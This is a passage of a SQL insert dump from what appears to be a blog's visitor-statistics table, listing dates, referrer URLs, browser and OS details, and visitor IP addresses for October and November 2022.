(25036,'2022-10-17','https://www.google.com/','Firefox','OS X','105.0','desktop','Macintosh','','185.196.220.26','000',0,2,0),
(25037,'2022-10-17','http://ictbank.ir/blog','Firefox','Linux','102.0','desktop','Unknown','','103.112.0.157','000',0,10,0),
(25038,'2022-10-17','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25039,'2022-10-17','http://ictbank.ir/blog','Firefox','Windows','2.0.0.3','desktop','Unknown','','185.220.101.164','000',0,1,0),
(25040,'2022-10-17','http://ictbank.ir/blog','Firefox','Windows','2.0.0.3','desktop','Unknown','','95.214.52.187','000',0,1,0),
(25041,'2022-10-17','http://www.design-arena.ir','Edge','Windows','15','desktop','Unknown','','185.220.101.36','000',0,2,0),
(25042,'2022-10-17','https://www.google.com/','Chrome','Windows','106.0.0.0','desktop','Unknown','','158.174.22.173','000',0,1,0),
(25043,'2022-10-17','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,11,0),
(25044,'2022-10-17','https://www.bing.com','Chrome','Windows','37.0.2049.0','desktop','Unknown','','142.93.201.0','000',0,3,0),
(25045,'2022-10-17','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25046,'2022-10-17','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.209.170','000',0,2,0),
(25047,'2022-10-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,2,0),
(25048,'2022-10-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25049,'2022-10-17','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25050,'2022-10-17','http://ictbank.ir/blog/index.php/category/os/linxu/oraclelinux/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','37.139.53.50','000',0,7,0),
(25051,'2022-10-17','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','5.189.184.9','000',0,1,0),
(25052,'2022-10-18','http://45.92.94.221/blog','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.38','000',0,1,0),
(25053,'2022-10-18','http://45.92.94.221/blog/','Chrome','Windows','79.0.3945.130','desktop','Unknown','','103.149.192.26','000',0,1,0),
(25054,'2022-10-18','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','121.4.78.18','000',0,2,0),
(25055,'2022-10-18','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25056,'2022-10-18','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.177','000',0,1,0),
(25057,'2022-10-18','http://ictbank.ir/blog','Firefox','OS X','5.0.1','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(25058,'2022-10-18','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.251.102.90','000',0,2,0),
(25059,'2022-10-18','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','208.80.194.121','000',0,4,0),
(25060,'2022-10-18','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25061,'2022-10-18','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','185.174.137.11','000',0,2,0),
(25062,'2022-10-18','https://www.google.com/','Firefox','OS X','105.0','desktop','Macintosh','','185.196.220.26','000',0,3,0),
(25063,'2022-10-18','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(25064,'2022-10-18','http://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','120.48.81.30','000',0,2,0),
(25065,'2022-10-18','http://ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','185.121.138.27','000',0,13,0),
(25066,'2022-10-18','http://www.ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','103.221.234.15','000',0,2,0),
(25067,'2022-10-18','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,2,0),
(25068,'2022-10-18','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','209.145.63.181','000',0,2,0),
(25069,'2022-10-18','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25070,'2022-10-18','http://ictbank.ir/blog','Firefox','Windows','9.0.1','desktop','Unknown','','5.76.75.114','000',0,2,0),
(25071,'2022-10-18','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(25072,'2022-10-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','95.179.211.0','000',0,1,0),
(25073,'2022-10-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,2,0),
(25074,'2022-10-18','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25075,'2022-10-18','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25076,'2022-10-18','http://www.ictbank.ir/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','59.36.163.204','000',0,2,0),
(25077,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','50.3.198.240','000',0,2,0),
(25078,'2022-10-19','http://ictbank.ir/blog','Chrome','OS X','91.0.4472.114','desktop','Macintosh','','3.128.201.25','000',0,4,0),
(25079,'2022-10-19','http://ictbank.ir/blog','Firefox','Windows','3.6.7','desktop','Unknown','','208.80.194.121','000',0,3,0),
(25080,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(25081,'2022-10-19','http://ictbank.ir/blog','Yandex Browser','Windows','22.7.0','desktop','Unknown','','165.231.130.63','000',0,2,0),
(25082,'2022-10-19','http://ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','5.157.14.171','000',0,13,0),
(25083,'2022-10-19','http://www.ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','45.120.50.176','000',0,2,0),
(25084,'2022-10-19','http://ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','23.231.32.254','000',0,10,0),
(25085,'2022-10-19','http://ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','45.120.51.151','000',0,13,0),
(25086,'2022-10-19','http://www.ictbank.ir/blog','Chrome','Linux','103.0.0.0','desktop','Unknown','','168.90.196.222','000',0,2,0),
(25087,'2022-10-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','23.90.160.114','000',0,2,0),
(25088,'2022-10-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.137','000',0,2,0),
(25089,'2022-10-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','20.52.4.134','000',0,2,0),
(25090,'2022-10-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.133.58','000',0,2,0),
(25091,'2022-10-19','http://ictbank.ir/blog','Opera','Windows','89.0.4447.51','desktop','Unknown','','103.204.110.133','000',0,2,0),
(25092,'2022-10-19','http://ictbank.ir/blog','Opera','Linux','89.0.4447.51','desktop','Unknown','','198.46.208.163','000',0,13,0),
(25093,'2022-10-19','http://www.ictbank.ir/blog','Opera','Linux','89.0.4447.51','desktop','Unknown','','173.44.223.111','000',0,2,0),
(25094,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','185.121.138.50','000',0,2,0),
(25095,'2022-10-19','http://ictbank.ir/blog','Opera','Linux','89.0.4447.51','desktop','Unknown','','196.16.74.186','000',0,2,0),
(25096,'2022-10-19','http://ictbank.ir/blog','Opera','Linux','89.0.4447.51','desktop','Unknown','','50.3.198.226','000',0,11,0),
(25097,'2022-10-19','http://www.ictbank.ir/blog','Opera','Linux','89.0.4447.51','desktop','Unknown','','103.221.235.147','000',0,2,0),
(25098,'2022-10-19','http://ictbank.ir/blog/','Opera','Linux','89.0.4447.51','desktop','Unknown','','196.16.74.25','000',0,1,0),
(25099,'2022-10-19','http://ictbank.ir/blog','Opera','Linux','89.0.4447.51','desktop','Unknown','','144.168.228.87','000',0,8,0),
(25100,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','27.0.1453.90','desktop','Unknown','','181.214.218.69','000',0,2,0),
(25101,'2022-10-19','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25102,'2022-10-19','http://ictbank.ir/blog','Chrome','Linux','12.0.742.100','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25103,'2022-10-19','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(25104,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','102.0.0.0','desktop','Unknown','','80.253.249.83','000',0,2,0),
(25105,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','44.0.2403.155','desktop','Unknown','','20.70.18.235','000',0,1,0),
(25106,'2022-10-19','http://ictbank.ir/blog','Chrome','Windows','95.0.4638.69','desktop','Unknown','','174.140.245.85','000',0,1,0),
(25107,'2022-10-19','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','142.93.74.152','000',0,2,0),
(25108,'2022-10-19','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(25109,'2022-10-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.0.229','000',0,1,0),
(25110,'2022-10-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','45.77.62.18','000',0,1,0),
(25111,'2022-10-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(25112,'2022-10-19','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','134.209.20.42','000',0,1,0),
(25113,'2022-10-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.106','000',0,2,0),
(25114,'2022-10-19','http://design-arena.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','173.212.224.141','000',0,3,0),
(25115,'2022-10-19','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25116,'2022-10-19','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(25117,'2022-10-20','http://ns11.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','193.118.55.170','000',0,2,0),
(25118,'2022-10-20','http://ictbank.ir/blog','Chrome','OS X','41.0.2227.1','desktop','Macintosh','','20.70.18.235','000',0,26,0),
(25119,'2022-10-20','http://ictbank.ir/blog','Firefox','OS X','3.6.11','desktop','Macintosh','','208.80.194.122','000',0,2,0),
(25120,'2022-10-20','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.164.227','000',0,2,0),
(25121,'2022-10-20','http://ictbank.ir/blog','Firefox','Windows','3.6.18','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25122,'2022-10-20','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.1.248.42','000',0,2,0),
(25123,'2022-10-20','http://ictbank.ir/blog','Chrome','Windows','41.0.2228.0','desktop','Unknown','','51.254.59.113','000',0,1,0),
(25124,'2022-10-20','https://www.bing.com/','Edge','Windows','106.0.1370.47','desktop','Unknown','','175.157.58.200','000',0,1,0),
(25125,'2022-10-20','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,2,0),
(25126,'2022-10-20','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','137.184.186.220','000',0,1,0),
(25127,'2022-10-20','http://ictbank.ir/blog','Chrome','Linux','12.0.742.100','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25128,'2022-10-20','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25129,'2022-10-20','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','46.232.12.57','000',0,2,0),
(25130,'2022-10-20','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.65.21','000',0,1,0),
(25131,'2022-10-20','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.212.11.177','000',0,1,0),
(25132,'2022-10-20','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','167.114.113.132','000',0,2,0),
(25133,'2022-10-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25134,'2022-10-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','217.69.14.171','000',0,1,0),
(25135,'2022-10-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(25136,'2022-10-20','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','159.65.21.153','000',0,1,0),
(25137,'2022-10-20','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,2,0),
(25138,'2022-10-20','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','46.232.12.200','000',0,2,0),
(25139,'2022-10-20','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.21','000',0,2,0),
(25140,'2022-10-20','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','162.221.192.26','000',0,2,0),
(25141,'2022-10-21','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.39','000',0,1,0),
(25142,'2022-10-21','http://ns2.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','185.180.143.47','000',0,2,0),
(25143,'2022-10-21','http://45.92.94.221/blog','Chrome','Windows','106.0.0.0','desktop','Unknown','','103.165.123.154','000',0,2,0),
(25144,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','101.0.4951.67','desktop','Unknown','','5.188.62.26','000',0,3,0),
(25145,'2022-10-21','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.76','000',0,1,0),
(25146,'2022-10-21','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.170','000',0,2,0),
(25147,'2022-10-21','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25148,'2022-10-21','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','78.46.75.88','000',0,6,0),
(25149,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(25150,'2022-10-21','https://www.bing.com/','Edge','Windows','106.0.1370.42','desktop','Unknown','','41.79.47.147','000',0,1,0),
(25151,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','71.0.3578.98','desktop','Unknown','','93.159.230.87','000',0,1,0),
(25152,'2022-10-21','https://www.bing.com','Chrome','Chrome OS','29.0.1547.57','desktop','Unknown','','23.97.205.210','000',0,1,0),
(25153,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','83.0.4103.106','desktop','Unknown','','52.207.252.233','000',0,2,0),
(25154,'2022-10-21','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.39','000',0,1,0),
(25155,'2022-10-21','http://45.92.94.221:80/blog','Chrome','Windows','88.0.4324.190','desktop','Unknown','','94.102.61.10','000',0,2,0),
(25156,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.212.11.177','000',0,1,0),
(25157,'2022-10-21','http://ictbank.ir/blog','Edge','Windows','96.0.1054.29','desktop','Unknown','','209.127.97.42','000',0,1,0),
(25158,'2022-10-21','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(25159,'2022-10-21','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','90.0.4430.93','desktop','Unknown','','176.53.141.46','000',0,2,0),
(25160,'2022-10-21','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','88.80.188.251','000',0,2,0),
(25161,'2022-10-21','http://ictbank.ir/blog/index.php/2020/02/02/rebuild-and-reorganize-all-indexes-within-a-database/','Chrome','Windows','90.0.4430.72','desktop','Unknown','','37.139.53.40','000',0,8,0),
(25162,'2022-10-21','http://ictbank.ir/blog','Firefox','Windows','7.0.1','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25163,'2022-10-21','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25164,'2022-10-21','http://ictbank.ir/blog','Sogou Explorer','Windows','Unknown','desktop','Unknown','','47.105.44.7','000',0,2,0),
(25165,'2022-10-21','http://design-arena.ir/blog','Chrome','Windows','100.0.4896.127','desktop','Unknown','','93.158.90.69','000',0,2,0),
(25166,'2022-10-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.131.196','000',0,1,0),
(25167,'2022-10-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
(25168,'2022-10-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.97.135.165','000',0,1,0),
(25169,'2022-10-21','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25170,'2022-10-21','http://ictbank.ir/blog','Chrome','OS X','39.0.2171.95','desktop','Macintosh','','51.83.241.230','000',0,2,0),
(25171,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','84.0.4147.105','desktop','Unknown','','5.161.133.63','000',0,1,0),
(25172,'2022-10-21','http://ictbank.ir/blog','Chrome','Windows','14.0.835.187','desktop','Unknown','','208.80.194.121','000',0,1,0),
(25173,'2022-10-21','http://ictbank.ir/blog/','Chrome','Windows','67.0.3396.99','desktop','Unknown','','84.17.60.74','000',0,2,0),
(25174,'2022-10-22','http://ictbank.ir/blog','Edge','Windows','91.0.864.54','desktop','Unknown','','185.181.60.189','000',0,2,0),
(25175,'2022-10-22','http://wikisonnati.com/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','5.189.183.89','000',0,2,0),
(25176,'2022-10-22','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25177,'2022-10-22','http://45.92.94.221:80/','Chrome','Windows','99.0.4896.127','desktop','Unknown','','79.137.202.73','000',0,2,0),
(25178,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.34','000',0,6,0),
(25179,'2022-10-22','http://ictbank.ir/blog','Safari','Windows','5.0.4','desktop','Unknown','','3.235.232.173','000',0,1,0),
(25180,'2022-10-22','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','64.124.51.154','000',0,2,0),
(25181,'2022-10-22','http://www.gumbo.com/','Firefox','Windows','25.0','desktop','Unknown','','35.87.57.127','000',0,1,0),
(25182,'2022-10-22','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,1,0),
(25183,'2022-10-22','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','34.219.231.152','000',0,1,0),
(25184,'2022-10-22','http://ictbank.ir/blog','Chromium','Ubuntu','12.0.742.112','desktop','Unknown','','208.80.194.121','000',0,2,0),
(25185,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.56','000',0,11,0),
(25186,'2022-10-22','http://ns1.design-arena.ir/blog','Chrome','Windows','66.0.3359.117','desktop','Unknown','','128.1.248.34','000',0,2,0),
(25187,'2022-10-22','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.134.134','000',0,2,0),
(25188,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.59','000',0,12,0),
(25189,'2022-10-22','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.184.160.82','000',0,1,0),
(25190,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.47','000',0,7,0),
(25191,'2022-10-22','http://wikisonnati.com/blog','Edge','Windows','103.0.1264.71','desktop','Unknown','','93.158.91.196','000',0,1,0),
(25192,'2022-10-22','http://wikisonnati.com/blog/','Edge','Windows','103.0.1264.71','desktop','Unknown','','93.158.91.229','000',0,1,0),
(25193,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','30.0.1599.66','desktop','Unknown','','62.210.215.118','000',0,4,0),
(25194,'2022-10-22','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','35.89.83.180','000',0,1,0),
(25195,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.51','000',0,8,0),
(25196,'2022-10-22','http://ictbank.ir/blog','Chrome','Linux','61.0.3163.79','desktop','Unknown','','64.124.8.46','000',0,12,0),
(25197,'2022-10-31','http://ictbank.ir/blog','Chrome','Windows','16.0.912.63','desktop','Unknown','','208.80.194.126','000',0,2,0),
(25198,'2022-10-31','http://design-arena.ir/blog/','Chrome','Windows','67.0.3396.62','desktop','Unknown','','185.189.114.126','000',0,3,0),
(25199,'2022-10-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.56','000',0,4,0),
(25200,'2022-10-31','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','128.14.141.34','000',0,2,0),
(25201,'2022-10-31','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','51.254.199.11','000',0,2,0),
(25202,'2022-10-31','http://ictbank.ir/blog','Chrome','Windows','9.0.597.94','desktop','Unknown','','208.80.194.122','000',0,2,0),
(25203,'2022-10-31','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(25204,'2022-10-31','http://ictbank.ir/blog','Chrome','Windows','66.0.3359.181','desktop','Unknown','','54.200.29.163','000',0,1,0),
(25205,'2022-10-31','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25206,'2022-10-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','209.250.227.63','000',0,1,0),
(25207,'2022-10-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','185.14.184.197','000',0,1,0),
(25208,'2022-10-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.199.102','000',0,1,0),
(25209,'2022-10-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','78.141.244.3','000',0,1,0),
(25210,'2022-10-31','http://ictbank.ir/blog','Firefox','Windows','106.0','desktop','Unknown','','5.112.251.225','000',0,1,0),
(25211,'2022-10-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.15','000',0,2,0),
(25212,'2022-10-31','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','89.248.165.169','000',0,2,0),
(25213,'2022-10-31','http://ns11.design-arena.ir/blog','Chrome','Windows','72.0.3626.119','desktop','Unknown','','111.7.100.26','000',0,1,0),
(25214,'2022-10-31','http://ns11.design-arena.ir/blog/','Chrome','Windows','72.0.3626.119','desktop','Unknown','','111.7.100.27','000',0,2,0),
(25215,'2022-10-31','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','123.145.25.34','000',0,1,0),
(25216,'2022-10-31','http://ictbank.ir/blog','Safari','iOS','9.0','mobile:smart','iPhone','','116.252.20.34','000',0,1,0),
(25217,'2022-10-31','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(25218,'2022-10-31','https://www.bing.com','Chrome','Windows','41.0.2225.0','desktop','Unknown','','159.223.196.15','000',0,1,0),
(25219,'2022-10-31','http://ictbank.ir/blog','Chrome','Windows','79.0','desktop','Unknown','','20.150.214.104','000',0,2,0),
(25220,'2022-11-01','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','94.130.167.248','000',0,2,0),
(25221,'2022-11-01','http://wikisonnati.com/blog/','Chrome','Windows','67.0.3396.87','desktop','Unknown','','138.199.63.40','000',0,3,0),
(25222,'2022-11-01','http://wikisonnati.com','Chrome','Windows','63.0.3239.84','desktop','Unknown','','185.220.101.56','000',0,2,0),
(25223,'2022-11-01','http://ns11.design-arena.ir/blog','Chrome','Windows','72.0.3626.119','desktop','Unknown','','36.99.136.135','000',0,1,0),
(25224,'2022-11-01','http://ns11.design-arena.ir/blog/','Chrome','Windows','72.0.3626.119','desktop','Unknown','','36.99.136.133','000',0,1,0),
(25225,'2022-11-01','http://ictbank.ir/blog','Firefox','Windows','1.0.7','desktop','Unknown','','185.100.87.174','000',0,1,0),
(25226,'2022-11-01','http://ictbank.ir/blog','Firefox','Windows','1.0.7','desktop','Unknown','','185.220.102.250','000',0,1,0),
(25227,'2022-11-01','http://ictbank.ir/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','42.83.147.34','000',0,2,0),
(25228,'2022-11-01','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','51.254.199.11','000',0,3,0),
(25229,'2022-11-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.103','000',0,2,0),
(25230,'2022-11-01','http://wikisonnati.com/blog','Chrome','Windows','74.0.3729.169','desktop','Unknown','','206.81.23.58','000',0,4,0),
(25231,'2022-11-01','http://45.92.94.221:80/blog','Chrome','Windows','78.0.3904.108','desktop','Unknown','','152.89.196.211','000',0,2,0),
(25232,'2022-11-01','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.137','000',0,2,0),
(25233,'2022-11-01','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(25234,'2022-11-01','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','193.118.53.194','000',0,2,0),
(25235,'2022-11-01','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.35','000',0,2,0),
(25236,'2022-11-01','http://design-arena.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','212.38.178.27','000',0,2,0),
(25237,'2022-11-01','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','188.165.223.112','000',0,1,0),
(25238,'2022-11-01','http://45.92.94.221/blog','Safari','iOS','13.0.3','mobile:smart','iPhone','','114.107.225.150','000',0,2,0),
(25239,'2022-11-01','http://ictbank.ir/blog','Safari','iOS','15.5','mobile:smart','iPhone','','93.158.91.214','000',0,1,0),
(25240,'2022-11-01','http://45.92.94.221/blog','Chrome','Windows','60.0.3112.113','desktop','Unknown','','185.180.143.135','000',0,2,0),
(25241,'2022-11-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.16','000',0,2,0),
(25242,'2022-11-01','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(25243,'2022-11-01','http://ictbank.ir','Chrome','Windows','50.0.2661.75','desktop','Unknown','','81.30.228.253','000',0,1,0),
(25244,'2022-11-01','http://45.92.94.221/blog','Chrome','OS X','55.0.2883.95','desktop','Macintosh','','94.102.51.9','000',0,2,0),
(25245,'2022-11-01','http://ictbank.ir/blog','Firefox','Linux','102.0','desktop','Unknown','','196.242.114.123','000',0,2,0),
(25246,'2022-11-01','http://wikisonnati.com','Chrome','Windows','50.0.2661.75','desktop','Unknown','','185.65.42.10','000',0,2,0),
(25247,'2022-11-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','82.196.5.234','000',0,1,0),
(25248,'2022-11-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.5112.97','desktop','Unknown','','104.238.170.64','000',0,1,0),
